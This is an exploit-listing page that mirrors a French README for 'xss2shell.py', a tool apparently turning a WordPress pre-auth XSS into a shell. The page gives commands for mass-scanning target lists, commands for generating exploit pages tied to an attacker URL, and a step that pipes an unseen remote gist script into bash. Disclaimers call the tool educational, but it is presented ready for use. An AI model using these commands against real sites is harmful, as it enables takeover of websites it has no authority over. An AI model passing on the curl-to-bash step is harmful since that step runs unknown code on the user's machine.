Sploitus

Exploit for CVE-2026-64638

kitploit · 2026-08-30

Exploit Code

MARKDOWN163 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-HORKIMHAB-CVE-2026-64638
# CVE-2026-64638

## Faire un don

Soutenez la maintenance de ce projet via PayPal ou en scannant le code QR ci-dessous.

![paypal](https://assets.kitploit.com/production/public/readmes/49488/33a91bd6d378215fcd413c279aa88d48bda6c8b2ef7695892777c87de37de256.gif)

![Code QR pour le don](https://assets.kitploit.com/production/public/readmes/49488/8547a914397adeef146bb206525c92eb7da797a813c32cfb688d89348a337974.jpg)

## ⚡ Utilisation simple

Utilisez ce projet uniquement dans des environnements sûrs et autorisés, tels que :

  * Machines virtuelles locales
  * Conteneurs Docker
  * Configurations de laboratoire isolées
  * Environnements de test d'intrusion autorisés



Exemple de configuration :

root@kitploit:~
    
    
    git clone <repository-url>
    cd <repository-name>
    
    # Project use python follow below
    
    # Create a virtual environment
    python -m venv venv
    
    # Activate the virtual environment
    
    # macOS / Linux
    source venv/bin/activate
    
    # Windows (Git Bash / WSL)
    source venv/Scripts/activate
    
    # Install requirments
    pip install -r requirements.txt
    
    

Exemple d'utilisation :

root@kitploit:~
    
    
    # 1. Scanning Mode - Detect Vulnerable WordPress Sites:
    
    # Scan a single URL
    python xss2shell.py scan http://wp-vm.local
    
    # Scan targets from file (one URL per line)
    python xss2shell.py scan targets.txt
    
    # Scan with custom settings
    python xss2shell.py scan targets.txt --workers 10 --output my_results.json
    
    # 2. Exploit Generation Mode - Create Exploit HTML Files
    # Generate exploit for single target
    python xss2shell.py exploit http://wp-vm.local --attacker-url http://attacker-vm.local
    
    # Generate exploits for multiple targets from file
    python xss2shell.py exploit targets.txt --attacker-url http://attacker-vm.local --output-dir exploits/
    
    # Specify admin username
    python xss2shell.py exploit http://wp-vm.local --attacker-url http://attacker-vm.local --admin-user administrator
    
    

Remarque :

  * Si vous clonez depuis un autre projet, vous devez exécuter `curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y` pour supprimer le dossier .git imbriqué
  * par ex. : cve-2025-46822.sh, cve-2025-46822-lab.sh, ...



* * *

## Crédit ou référence

  * https://thehackernews.com/2026/08/new-wordpress-pre-auth-xss-could-lead.html
  * https://pwn.ai/blog/xss2shell



* * *

# 📚 Dépôt de recherche pédagogique en sécurité

Un dépôt pour apprendre, tester et rechercher des concepts de cybersécurité dans des environnements contrôlés.

* * *

## ⚠️ Avertissement de sécurité et mention légale

## Objectif

Ce dépôt est destiné **uniquement à la recherche en sécurité pédagogique et autorisée**.

Il est conçu pour aider les utilisateurs à découvrir :

  * Vulnérabilités de sécurité
  * Concepts de bac Ă  sable (sandbox) et d'isolation
  * Pratiques de codage sécurisé et de défense



* * *

## Utilisation autorisée uniquement

Utilisez ce dépôt uniquement dans des environnements où vous avez l'autorisation, comme :

  * Laboratoires personnels ou machines virtuelles
  * Environnements Docker ou isolés
  * Tests d'intrusion autorisés
  * Formation en cybersécurité ou recherche académique



Toute utilisation non autorisée ou illégale est strictement interdite.

* * *

## Aucune responsabilité

L'auteur et les contributeurs **ne sont pas responsables** des dommages, utilisations abusives, problèmes juridiques ou pertes causés par ce projet.

En utilisant ce dépôt, vous acceptez que :

  * Vous ĂŞtes responsable de vos propres actions
  * Vous l'utiliserez légalement et de manière éthique
  * Le projet est fourni **sans garantie**



* * *

## Utilisation éthique

Ce projet est conçu pour :

  * Recherche en sécurité défensive
  * Éducation à la cybersécurité
  * Sensibilisation aux vulnérabilités
  * Recherche sur les systèmes et logiciels sécurisés



Veuillez suivre les pratiques de divulgation responsable et vous conformer Ă  toutes les lois applicables.

* * *

## Contact

Pour une divulgation responsable ou une collaboration, contactez le mainteneur du dépôt via GitHub.